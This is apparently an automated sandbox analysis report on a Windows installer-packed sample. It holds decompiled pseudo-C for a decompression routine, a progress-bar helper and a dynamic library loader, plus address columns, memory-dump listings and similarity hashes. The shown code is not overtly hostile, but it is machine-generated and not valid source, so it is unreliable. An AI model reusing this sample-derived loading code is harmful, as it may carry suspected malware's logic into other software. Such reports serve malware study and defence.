													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                  0x00000000
                  0x00406ac7
                  0x00406ac7
                  0x00406acb
                  0x00406af4
                  0x00406afe
                  0x00406acd
                  0x00406ad6
                  0x00406ae3
                  0x00406ae6
                  0x00406e2a
                  0x00406e2a
                  0x00406e2d
                  0x00406e2d
                  0x00406e2d
                  0x00406e33
                  0x00406e39
                  0x00406e3f
                  0x00406e59
                  0x00406e5c
                  0x00406e62
                  0x00406e6d
                  0x00406e6f
                  0x00406e41
                  0x00406e41
                  0x00406e50
                  0x00406e54
                  0x00406e54
                  0x00406e79
                  0x00000000
                  0x00000000
                  0x00406e7b
                  0x00406e7f
                  0x0040702e
                  0x00407044
                  0x0040704c
                  0x00407053
                  0x00407055
                  0x0040705c
                  0x00407060
                  0x00407060
                  0x00406e8b
                  0x00406e92
                  0x00406e9a
                  0x00406e9d
                  0x00406ea0
                  0x00406ea0
                  0x00406ea6
                  0x00406ea6
                  0x00406642
                  0x00406642
                  0x00406642
                  0x0040664b
                  0x00000000
                  0x00000000
                  0x00406651
                  0x00000000
                  0x0040665c
                  0x00000000
                  0x00000000
                  0x00406665
                  0x00406668
                  0x0040666b
                  0x0040666f
                  0x00000000
                  0x00000000
                  0x00406675
                  0x00406678
                  0x0040667a
                  0x0040667b
                  0x0040667e
                  0x00406680
                  0x00406681
                  0x00406683
                  0x00406686
                  0x0040668b
                  0x00406690
                  0x00406699
                  0x004066ac
                  0x004066af
                  0x004066bb
                  0x004066e3
                  0x004066e5
                  0x004066f3
                  0x004066f3
                  0x004066f7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004066e7
                  0x004066e7
                  0x004066ea
                  0x004066eb
                  0x004066eb
                  0x00000000
                  0x004066e7
                  0x004066c1
                  0x004066c6
                  0x004066c6
                  0x004066cf
                  0x004066d7
                  0x004066da
                  0x00000000
                  0x004066e0
                  0x004066e0
                  0x00000000
                  0x004066e0
                  0x00000000
                  0x004066fd
                  0x004066fd
                  0x00406701
                  0x00406fad
                  0x00000000
                  0x00406fad
                  0x0040670a
                  0x0040671a
                  0x0040671d
                  0x00406720
                  0x00406720
                  0x00406720
                  0x00406723
                  0x00406727
                  0x00000000
                  0x00000000
                  0x00406729
                  0x0040672f
                  0x00406759
                  0x0040675f
                  0x00406766
                  0x00000000
                  0x00406766
                  0x00406735
                  0x00406738
                  0x0040673d
                  0x0040673d
                  0x00406748
                  0x00406750
                  0x00406753
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406798
                  0x0040679e
                  0x004067a1
                  0x004067ae
                  0x004067b6
                  0x00406e2a
                  0x00000000
                  0x00000000
                  0x0040676d
                  0x0040676d
                  0x00406771
                  0x00406fbc
                  0x00000000
                  0x00406fbc
                  0x0040677d
                  0x00406788
                  0x00406788
                  0x00406788
                  0x0040678b
                  0x0040678e
                  0x00406791
                  0x00406796
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406e2d
                  0x00406e2d
                  0x00406e33
                  0x00406e39
                  0x00406e3f
                  0x00406e59
                  0x00406e5c
                  0x00406e62
                  0x00406e6d
                  0x00406e6f
                  0x00406e41
                  0x00406e41
                  0x00406e50
                  0x00406e54
                  0x00406e54
                  0x00406e79
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004067be
                  0x004067c0
                  0x004067c3
                  0x00406834
                  0x00406837
                  0x0040683a
                  0x00406841
                  0x0040684b
                  0x00406e2a
                  0x00406e2a
                  0x00000000
                  0x00406e2a
                  0x00406e2a
                  0x004067c5
                  0x004067c9
                  0x004067cc
                  0x004067ce
                  0x004067d1
                  0x004067d4
                  0x004067d6
                  0x004067d9
                  0x004067db
                  0x004067e0
                  0x004067e3
                  0x004067e6
                  0x004067ea
                  0x004067f1
                  0x004067f4
                  0x004067fb
                  0x004067ff
                  0x00406807
                  0x00406807
                  0x00406807
                  0x00406801
                  0x00406801
                  0x00406801
                  0x004067f6
                  0x004067f6
                  0x004067f6
                  0x0040680b
                  0x0040680e
                  0x0040682c
                  0x0040682e
                  0x00000000
                  0x00406810
                  0x00406810
                  0x00406813
                  0x00406816
                  0x00406819
                  0x0040681b
                  0x0040681b
                  0x0040681b
                  0x0040681e
                  0x00406821
                  0x00406823
                  0x00406824
                  0x00406827
                  0x00000000
                  0x00406827
                  0x00000000
                  0x00406a5d
                  0x00406a61
                  0x00406a7f
                  0x00406a82
                  0x00406a89
                  0x00406a8c
                  0x00406a8f
                  0x00406a92
                  0x00406a95
                  0x00406a98
                  0x00406a9a
                  0x00406aa1
                  0x00406aa2
                  0x00406aa4
                  0x00406aa7
                  0x00406aaa
                  0x00406aad
                  0x00406aad
                  0x00406ab2
                  0x00000000
                  0x00406ab2
                  0x00406a63
                  0x00406a66
                  0x00406a69
                  0x00406a73
                  0x00406e2a
                  0x00406e2a
                  0x00000000
                  0x00406e2a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406b0a
                  0x00406b0e
                  0x00000000
                  0x00000000
                  0x00406b14
                  0x00406b18
                  0x00000000
                  0x00000000
                  0x00406b1e
                  0x00406b20
                  0x00406b24
                  0x00406b24
                  0x00406b27
                  0x00406b2b
                  0x00000000
                  0x00000000
                  0x00406b7b
                  0x00406b7f
                  0x00406b86
                  0x00406b89
                  0x00406b8c
                  0x00406b96
                  0x00406e2a
                  0x00406e2a
                  0x00000000
                  0x00406e2a
                  0x00406e2a
                  0x00406b81
                  0x00000000
                  0x00000000
                  0x00406ba2
                  0x00406ba6
                  0x00406bad
                  0x00406bb0
                  0x00406bb3
                  0x00406ba8
                  0x00406ba8
                  0x00406ba8
                  0x00406bb6
                  0x00406bb9
                  0x00406bbc
                  0x00406bbc
                  0x00406bbf
                  0x00406bc2
                  0x00406bc5
                  0x00406bc5
                  0x00406bc8
                  0x00406bcf
                  0x00406bd4
                  0x00000000
                  0x00000000
                  0x00406c62
                  0x00406c62
                  0x00406c66
                  0x00407004
                  0x00000000
                  0x00407004
                  0x00406c6c
                  0x00406c6f
                  0x00406c72
                  0x00406c76
                  0x00406c79
                  0x00406c7f
                  0x00406c81
                  0x00406c81
                  0x00406c81
                  0x00406c84
                  0x00406c87
                  0x00000000
                  0x00000000
                  0x00406857
                  0x00406857
                  0x0040685b
                  0x00406fc8
                  0x00000000
                  0x00406fc8
                  0x00406861
                  0x00406864
                  0x00406867
                  0x0040686b
                  0x0040686e
                  0x00406874
                  0x00406876
                  0x00406876
                  0x00406876
                  0x00406879
                  0x0040687c
                  0x0040687c
                  0x0040687f
                  0x00406882
                  0x00000000
                  0x00000000
                  0x00406888
                  0x0040688e
                  0x00000000
                  0x00000000
                  0x00406894
                  0x00406894
                  0x00406898
                  0x0040689b
                  0x0040689e
                  0x004068a1
                  0x004068a4
                  0x004068a5
                  0x004068a8
                  0x004068aa
                  0x004068b0
                  0x004068b3
                  0x004068b6
                  0x004068b9
                  0x004068bc
                  0x004068bf
                  0x004068c2
                  0x004068de
                  0x004068e1
                  0x004068e4
                  0x004068e7
                  0x004068ee
                  0x004068f2
                  0x004068f4
                  0x004068f8
                  0x004068c4
                  0x004068c4
                  0x004068c8
                  0x004068d0
                  0x004068d5
                  0x004068d7
                  0x004068d9
                  0x004068d9
                  0x004068fb
                  0x00406902
                  0x00406905
                  0x00000000
                  0x0040690b
                  0x00000000
                  0x0040690b
                  0x00000000
                  0x00406910
                  0x00406910
                  0x00406914
                  0x00406fd4
                  0x00000000
                  0x00406fd4
                  0x0040691a
                  0x0040691d
                  0x00406920
                  0x00406924
                  0x00406927
                  0x0040692d
                  0x0040692f
                  0x0040692f
                  0x0040692f
                  0x00406932
                  0x00406935
                  0x00406935
                  0x00406935
                  0x0040693b
                  0x00000000
                  0x00000000
                  0x0040693d
                  0x00406940
                  0x00406943
                  0x00406946
                  0x00406949
                  0x0040694c
                  0x0040694f
                  0x00406952
                  0x00406955
                  0x00406958
                  0x0040695b
                  0x00406973
                  0x00406976
                  0x00406979
                  0x0040697c
                  0x0040697c
                  0x0040697f
                  0x00406983
                  0x00406985
                  0x0040695d
                  0x0040695d
                  0x00406965
                  0x0040696a
                  0x0040696c
                  0x0040696e
                  0x0040696e
                  0x00406988
                  0x0040698f
                  0x00406992
                  0x00000000
                  0x00406994
                  0x00000000
                  0x00406994
                  0x00406992
                  0x00406999
                  0x00406999
                  0x00406999
                  0x00406999
                  0x00000000
                  0x00000000
                  0x004069d4
                  0x004069d4
                  0x004069d8
                  0x00406fe0
                  0x00000000
                  0x00406fe0
                  0x004069de
                  0x004069e1
                  0x004069e4
                  0x004069e8
                  0x004069eb
                  0x004069f1
                  0x004069f3
                  0x004069f3
                  0x004069f3
                  0x004069f6
                  0x004069f9
                  0x004069f9
                  0x004069ff
                  0x0040699d
                  0x0040699d
                  0x004069a0
                  0x00000000
                  0x004069a0
                  0x00406a01
                  0x00406a01
                  0x00406a04
                  0x00406a07
                  0x00406a0a
                  0x00406a0d
                  0x00406a10
                  0x00406a13
                  0x00406a16
                  0x00406a19
                  0x00406a1c
                  0x00406a1f
                  0x00406a37
                  0x00406a3a
                  0x00406a3d
                  0x00406a40
                  0x00406a40
                  0x00406a43
                  0x00406a47
                  0x00406a49
                  0x00406a21
                  0x00406a21
                  0x00406a29
                  0x00406a2e
                  0x00406a30
                  0x00406a32
                  0x00406a32
                  0x00406a4c
                  0x00406a53
                  0x00406a56
                  0x00000000
                  0x00406a58
                  0x00000000
                  0x00406a58
                  0x00000000
                  0x00406ce5
                  0x00406ce5
                  0x00406ce9
                  0x00407010
                  0x00000000
                  0x00407010
                  0x00406cef
                  0x00406cf2
                  0x00406cf5
                  0x00406cf9
                  0x00406cfc
                  0x00406d02
                  0x00406d04
                  0x00406d04
                  0x00406d04
                  0x00406d07
                  0x00000000
                  0x00000000
                  0x00406ab5
                  0x00406ab5
                  0x00406ab8
                  0x00406e2a
                  0x00406e2a
                  0x00000000
                  0x00406e2a
                  0x00000000
                  0x00406df4
                  0x00406df8
                  0x00406e1a
                  0x00406e1d
                  0x00406e27
                  0x00406e2a
                  0x00406e2a
                  0x00000000
                  0x00406e2a
                  0x00406e2a
                  0x00406dfa
                  0x00406dfd
                  0x00406e01
                  0x00406e04
                  0x00406e04
                  0x00406e07
                  0x00000000
                  0x00000000
                  0x00406eb1
                  0x00406eb5
                  0x00406ed3
                  0x00406ed3
                  0x00406ed3
                  0x00406eda
                  0x00406ee1
                  0x00406ee8
                  0x00406ee8
                  0x00000000
                  0x00406ee8
                  0x00406eb7
                  0x00406eba
                  0x00406ebd
                  0x00406ec0
                  0x00406ec7
                  0x00406e0b
                  0x00406e0b
                  0x00406e0e
                  0x00000000
                  0x00000000
                  0x00406fa2
                  0x00406fa5
                  0x00406ea6
                  0x00000000
                  0x00000000
                  0x00406bdc
                  0x00406bde
                  0x00406be5
                  0x00406be6
                  0x00406be8
                  0x00406beb
                  0x00000000
                  0x00000000
                  0x00406bf3
                  0x00406bf6
                  0x00406bf9
                  0x00406bfb
                  0x00406bfd
                  0x00406bfd
                  0x00406bfe
                  0x00406c01
                  0x00406c08
                  0x00406c0b
                  0x00406c19
                  0x00000000
                  0x00000000
                  0x00406eef
                  0x00406eef
                  0x00406ef2
                  0x00406ef9
                  0x00000000
                  0x00000000
                  0x00406efe
                  0x00406efe
                  0x00406f02
                  0x0040703a
                  0x00000000
                  0x0040703a
                  0x00406f08
                  0x00406f0b
                  0x00406f0e
                  0x00406f12
                  0x00406f15
                  0x00406f1b
                  0x00406f1d
                  0x00406f1d
                  0x00406f1d
                  0x00406f20
                  0x00406f23
                  0x00406f23
                  0x00406f23
                  0x00406f23
                  0x00406f26
                  0x00406f26
                  0x00406f2a
                  0x00406f8a
                  0x00406f8d
                  0x00406f92
                  0x00406f93
                  0x00406f95
                  0x00406f97
                  0x00406f9a
                  0x00406ea6
                  0x00406ea6
                  0x00000000
                  0x00406eac
                  0x00406ea6
                  0x00406f2c
                  0x00406f32
                  0x00406f35
                  0x00406f38
                  0x00406f3b
                  0x00406f3e
                  0x00406f41
                  0x00406f44
                  0x00406f47
                  0x00406f4a
                  0x00406f4d
                  0x00406f66
                  0x00406f69
                  0x00406f6c
                  0x00406f6f
                  0x00406f73
                  0x00406f75
                  0x00406f75
                  0x00406f76
                  0x00406f79
                  0x00406f4f
                  0x00406f4f
                  0x00406f57
                  0x00406f5c
                  0x00406f5e
                  0x00406f61
                  0x00406f61
                  0x00406f7c
                  0x00406f83
                  0x00000000
                  0x00406f85
                  0x00000000
                  0x00406f85
                  0x00000000
                  0x00406c21
                  0x00406c24
                  0x00406c5a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8a
                  0x00406d8d
                  0x00406d8d
                  0x00406d90
                  0x00406d92
                  0x0040701c
                  0x00000000
                  0x0040701c
                  0x00406d98
                  0x00406d9b
                  0x00000000
                  0x00000000
                  0x00406da1
                  0x00406da5
                  0x00406da8
                  0x00406da8
                  0x00406da8
                  0x00000000
                  0x00406da8
                  0x00406c26
                  0x00406c28
                  0x00406c2a
                  0x00406c2c
                  0x00406c2f
                  0x00406c30
                  0x00406c32
                  0x00406c34
                  0x00406c37
                  0x00406c3a
                  0x00406c50
                  0x00406c55
                  0x00406c8d
                  0x00406c8d
                  0x00406c91
                  0x00406cbd
                  0x00406cbf
                  0x00406cc6
                  0x00406cc9
                  0x00406ccc
                  0x00406ccc
                  0x00406cd1
                  0x00406cd1
                  0x00406cd3
                  0x00406cd6
                  0x00406cdd
                  0x00406ce0
                  0x00406d0d
                  0x00406d0d
                  0x00406d10
                  0x00406d13
                  0x00406d87
                  0x00406d87
                  0x00406d87
                  0x00000000
                  0x00406d87
                  0x00406d15
                  0x00406d1b
                  0x00406d1e
                  0x00406d21
                  0x00406d24
                  0x00406d27
                  0x00406d2a
                  0x00406d2d
                  0x00406d30
                  0x00406d33
                  0x00406d36
                  0x00406d4f
                  0x00406d51
                  0x00406d54
                  0x00406d55
                  0x00406d58
                  0x00406d5a
                  0x00406d5d
                  0x00406d5f
                  0x00406d61
                  0x00406d64
                  0x00406d66
                  0x00406d69
                  0x00406d6d
                  0x00406d6f
                  0x00406d6f
                  0x00406d70
                  0x00406d73
                  0x00406d76
                  0x00406d38
                  0x00406d38
                  0x00406d40
                  0x00406d45
                  0x00406d47
                  0x00406d4a
                  0x00406d4a
                  0x00406d79
                  0x00406d80
                  0x00406d0a
                  0x00406d0a
                  0x00406d0a
                  0x00406d0a
                  0x00000000
                  0x00406d82
                  0x00000000
                  0x00406d82
                  0x00406d80
                  0x00406c93
                  0x00406c96
                  0x00406c98
                  0x00406c9b
                  0x00406c9e
                  0x00406ca1
                  0x00406ca3
                  0x00406ca6
                  0x00406ca9
                  0x00406ca9
                  0x00406cac
                  0x00406cac
                  0x00406caf
                  0x00406cb6
                  0x00406c8a
                  0x00406c8a
                  0x00406c8a
                  0x00406c8a
                  0x00000000
                  0x00406cb8
                  0x00000000
                  0x00406cb8
                  0x00406cb6
                  0x00406c3c
                  0x00406c3f
                  0x00406c41
                  0x00406c44
                  0x00000000
                  0x00000000
                  0x004069a3
                  0x004069a3
                  0x004069a7
                  0x00406fec
                  0x00000000
                  0x00406fec
                  0x004069ad
                  0x004069b0
                  0x004069b3
                  0x004069b6
                  0x004069b9
                  0x004069bc
                  0x004069bf
                  0x004069c1
                  0x004069c4
                  0x004069c7
                  0x004069ca
                  0x004069cc
                  0x004069cc
                  0x004069cc
                  0x00000000
                  0x00000000
                  0x00406b2e
                  0x00406b2e
                  0x00406b32
                  0x00406ff8
                  0x00000000
                  0x00406ff8
                  0x00406b38
                  0x00406b3b
                  0x00406b3e
                  0x00406b41
                  0x00406b43
                  0x00406b43
                  0x00406b43
                  0x00406b46
                  0x00406b49
                  0x00406b4c
                  0x00406b4f
                  0x00406b52
                  0x00406b55
                  0x00406b56
                  0x00406b58
                  0x00406b58
                  0x00406b58
                  0x00406b5b
                  0x00406b5e
                  0x00406b61
                  0x00406b64
                  0x00406b64
                  0x00406b64
                  0x00406b67
                  0x00406b69
                  0x00406b69
                  0x00000000
                  0x00000000
                  0x00406dab
                  0x00406dab
                  0x00406dab
                  0x00406daf
                  0x00000000
                  0x00000000
                  0x00406db5
                  0x00406db8
                  0x00406dbb
                  0x00406dbe
                  0x00406dc0
                  0x00406dc0
                  0x00406dc0
                  0x00406dc3
                  0x00406dc6
                  0x00406dc9
                  0x00406dcc
                  0x00406dcf
                  0x00406dd2
                  0x00406dd3
                  0x00406dd5
                  0x00406dd5
                  0x00406dd5
                  0x00406dd8
                  0x00406ddb
                  0x00406dde
                  0x00406de1
                  0x00406de4
                  0x00406de8
                  0x00406dea
                  0x00406ded
                  0x00000000
                  0x00406def
                  0x00406b6c
                  0x00406b6c
                  0x00000000
                  0x00406b6c
                  0x00406ded
                  0x00407022
                  0x00000000
                  0x00000000
                  0x00406651
                  0x00407059
                  0x00407059
                  0x00000000
                  0x00407059
                  0x00406ea6
                  0x00406e2d
                  0x00406e2a

                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0acf286bb029991ed8d3626521cf090d2a7bfbfd73cbce5b83777d77729d6ca6
                  • Instruction ID: 8ba59c5cd0d20fcb356abc66f065f0fd9b5ab0142fa9d7a08340707df7706276
                  • Opcode Fuzzy Hash: 0acf286bb029991ed8d3626521cf090d2a7bfbfd73cbce5b83777d77729d6ca6
                  • Instruction Fuzzy Hash: 2A715571D00229CBDF28CF98C844BADBBB1FF44305F15816AD856B7281C779AA96DF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A81E7D, Relevance: 4.9, APIs: 3, Instructions: 431COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.200598798.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6452ba57709ec1fb816758cebf9a4bc95317ce256f2df9cb1cd6bfbf94ca3611
                  • Instruction ID: 5e46ea8c06eef605954333d7c6da7743886dc8a5e1ef4ecb345f08b407b21ea2
                  • Opcode Fuzzy Hash: 6452ba57709ec1fb816758cebf9a4bc95317ce256f2df9cb1cd6bfbf94ca3611
                  • Instruction Fuzzy Hash: 2DF13125E50358A9EB60DBE4EC15FFEB3B5AF48B10F205497F60CEE190E3744A809B19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 59%
                  			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x424770;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x423f0c =  *0x423f0c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x423f0c, 0x7530,  *0x423ef4), 0);
					}
				}
				return 0;
			}











                  0x0040138a
                  0x004013fa
                  0x0040139b
                  0x004013a0
                  0x00000000
                  0x00000000
                  0x004013a2
                  0x004013a3
                  0x004013ad
                  0x00000000
                  0x00401404
                  0x004013b0
                  0x004013b7
                  0x004013bd
                  0x004013be
                  0x004013c0
                  0x004013c2
                  0x004013b9
                  0x004013b9
                  0x004013ba
                  0x004013ba
                  0x004013c9
                  0x004013cb
                  0x004013f4
                  0x004013f4
                  0x004013c9
                  0x00000000

                  APIs
                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: 1fe9c1000dbda7a9d39110f4f9bff940efbdf01e75595cec207c4de3ebb5c286
                  • Instruction ID: 30547d814f52c0c9fa729df1a4499858ceafdecff29ed48dfb424bf33c152dfa
                  • Opcode Fuzzy Hash: 1fe9c1000dbda7a9d39110f4f9bff940efbdf01e75595cec207c4de3ebb5c286
                  • Instruction Fuzzy Hash: 3401D131B242109BE7194B389E05B2A36A8E710315F51823AB951F65F1D778CC129B4C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004064CA, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004064CA(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a240);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
				}
				_t5 = E0040645C(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                  0x004064d2
                  0x004064d5
                  0x004064dc
                  0x004064e4
                  0x004064f0
                  0x00000000
                  0x004064f7
                  0x004064e7
                  0x004064ee
                  0x00000000
                  0x004064ff
                  0x00000000

                  APIs
                  • GetModuleHandleA.KERNEL32(?,?,?,00403385,0000000B), ref: 004064DC
                  • GetProcAddress.KERNEL32(00000000,?), ref: 004064F7
                    • Part of subcall function 0040645C: GetSystemDirectoryA.KERNEL32 ref: 00406473
                    • Part of subcall function 0040645C: wsprintfA.USER32 ref: 004064AC
                    • Part of subcall function 0040645C: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064C0
                  Memory Dump Source
